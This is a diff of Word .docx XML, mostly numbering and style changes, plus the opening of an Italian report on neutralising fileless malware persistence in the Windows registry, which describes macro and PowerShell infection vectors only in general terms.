+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48147DBA"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="59F8FA30"/>
@@ -2342,7 +2907,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48826219"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="23F60560"/>
@@ -2491,7 +3056,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4BCA3A0D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BA143F50"/>
@@ -2580,7 +3145,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="561B161F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="9A64578A"/>
@@ -2729,7 +3294,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5ECB57B5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E3DAB198"/>
@@ -2815,7 +3380,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6267650E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1486BBBA"/>
@@ -2964,7 +3529,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="686A7968"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="AF642DA8"/>
@@ -3113,7 +3678,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="695E02A4"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1B76F0F0"/>
@@ -3262,7 +3827,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CDF7FB3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="7084172C"/>
@@ -3411,7 +3976,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6CEC6A36"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2C88B578"/>
@@ -3500,7 +4065,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7168611A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E1808E96"/>
@@ -3613,7 +4178,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="76AF5C5E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3FAAE8C2"/>
@@ -3700,13 +4265,127 @@
       <w:pPr>
         <w:ind w:left="6828" w:hanging="180"/>
       </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="772F064C"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="B224C640"/>
+    <w:lvl w:ilvl="0" w:tplc="17D6AB90">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:color w:val="000000" w:themeColor="text1"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04100001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04100003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04100005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="405763203">
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="62338613">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="993728766">
     <w:abstractNumId w:val="3"/>
@@ -3732,34 +4411,34 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="340402470">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="840893291">
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1137642995">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1901280077">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="1505129166">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="1966766617">
     <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="1079909917">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="12" w16cid:durableId="1981299414">
+    <w:abstractNumId w:val="15"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="1699313517">
     <w:abstractNumId w:val="14"/>
   </w:num>
-  <w:num w:numId="13" w16cid:durableId="1699313517">
-    <w:abstractNumId w:val="13"/>
-  </w:num>
   <w:num w:numId="14" w16cid:durableId="998113943">
-    <w:abstractNumId w:val="15"/>
+    <w:abstractNumId w:val="16"/>
   </w:num>
   <w:num w:numId="15" w16cid:durableId="2034728165">
     <w:abstractNumId w:val="0"/>
@@ -3768,13 +4447,19 @@
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="17" w16cid:durableId="480774904">
+    <w:abstractNumId w:val="18"/>
+  </w:num>
+  <w:num w:numId="18" w16cid:durableId="1595555786">
+    <w:abstractNumId w:val="19"/>
+  </w:num>
+  <w:num w:numId="19" w16cid:durableId="1238134191">
     <w:abstractNumId w:val="17"/>
   </w:num>
-  <w:num w:numId="18" w16cid:durableId="1595555786">
-    <w:abstractNumId w:val="18"/>
+  <w:num w:numId="20" w16cid:durableId="1038969861">
+    <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="19" w16cid:durableId="1238134191">
-    <w:abstractNumId w:val="16"/>
+  <w:num w:numId="21" w16cid:durableId="1410880810">
+    <w:abstractNumId w:val="20"/>
   </w:num>
 </w:numbering>
 </file>
@@ -4382,6 +5067,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Carpredefinitoparagrafo">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tabellanormale">
@@ -4731,6 +5417,48 @@
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B951B4"/>
+    <w:rPr>
+      <w:color w:val="467886" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Menzionenonrisolta">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B951B4"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Grigliatabellachiara">
+    <w:name w:val="Grid Table Light"/>
+    <w:basedOn w:val="Tabellanormale"/>
+    <w:uiPriority w:val="40"/>
+    <w:rsid w:val="00FA2A37"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="BFBFBF" w:themeColor="background1" w:themeShade="BF"/>
+      </w:tblBorders>
+    </w:tblPr>
   </w:style>
 </w:styles>
 </file>

--- a/Cosa scrivono i malware fileless sui registri.docx
+++ b/Cosa scrivono i malware fileless sui registri.docx
@@ -7,19 +7,73 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>Neutralizza</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>re</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> persistenza di fileless </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t xml:space="preserve">malwares </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+        </w:rPr>
+        <w:t>su sistemi Windows</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>I fileless malware e i registri di sistema</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Introduzione</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -27,42 +81,31 @@
         <w:rPr>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Il Registro di Sistema di Windows è un database gerarchico che memorizza le impostazioni di configurazione</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> del sistema operativo e dei programmi installati</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">I </w:t>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Nel panorama odierno della cybersicurezza si assiste a un cambiamento radicale nelle strategie di infezione: il progressivo abbandono dei tradizionali file eseguibili (.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) malevoli a favore di un approccio </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -71,7 +114,37 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>fileless malware</w:t>
+        <w:t>fileless</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Come suggerisce il termine, questa tipologia di minaccia non deposita </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>eseguibili</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> sospetti sul disco rigido, ma opera sfruttando la memoria RAM e strumenti legittimi già presenti nel sistema </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Windows</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -85,56 +158,25 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t xml:space="preserve">possono sfruttare </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">particolari </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>chiavi d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">el registro </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">per portare a compimento i </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>loro</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> scop</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>i</w:t>
+        <w:t xml:space="preserve">(come </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Powershell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ad esempio)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -156,7 +198,137 @@
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>Le HKEY non hanno tutte lo stesso scopo</w:t>
+        <w:t xml:space="preserve">Questa evoluzione nasce dall'esigenza degli attaccanti di eludere le soluzioni di sicurezza convenzionali, quali gli antivirus basati su firma, che focalizzano la loro attività di scansione principalmente sul file system. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tuttavia,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> per un </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>fileless malware</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> operare esclusivamente in RAM presenta un limite critico: la volatilità. Se risiedesse solo nella memoria volatile, la minaccia verrebbe eliminata a ogni semplice riavvio del computer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Per garantire la propria sopravvivenza, il malware fileless deve dunque stabilire un meccanismo di </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>persistenza</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. È in questa fase che il Registro di Sistema di Windows viene trasformato da database di configurazione a vero e proprio supporto </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>di</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> storage per il </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>virus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Il vettore di attacco: dall'esecuzione iniziale alla scrittura nel Registro</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Prima di potersi stabilire nel Registro di Sistema, il malware deve ottenere l'accesso iniziale al computer vittima. Questo avviene solitamente attraverso tecniche che non prevedono il salvataggio di un eseguibile tradizionale sul disco</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -164,6 +336,393 @@
           <w:szCs w:val="26"/>
         </w:rPr>
         <w:t>, ad esempio</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="24"/>
+        </w:numPr>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Phishing e </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ocumenti </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>m</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">acro: L'utente riceve un file (es. Word o Excel) che, una volta aperto, esegue una macro. Questa macro non scarica un virus, ma lancia direttamente un comando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> che scrive le chiavi malevole nel registro.</w:t>
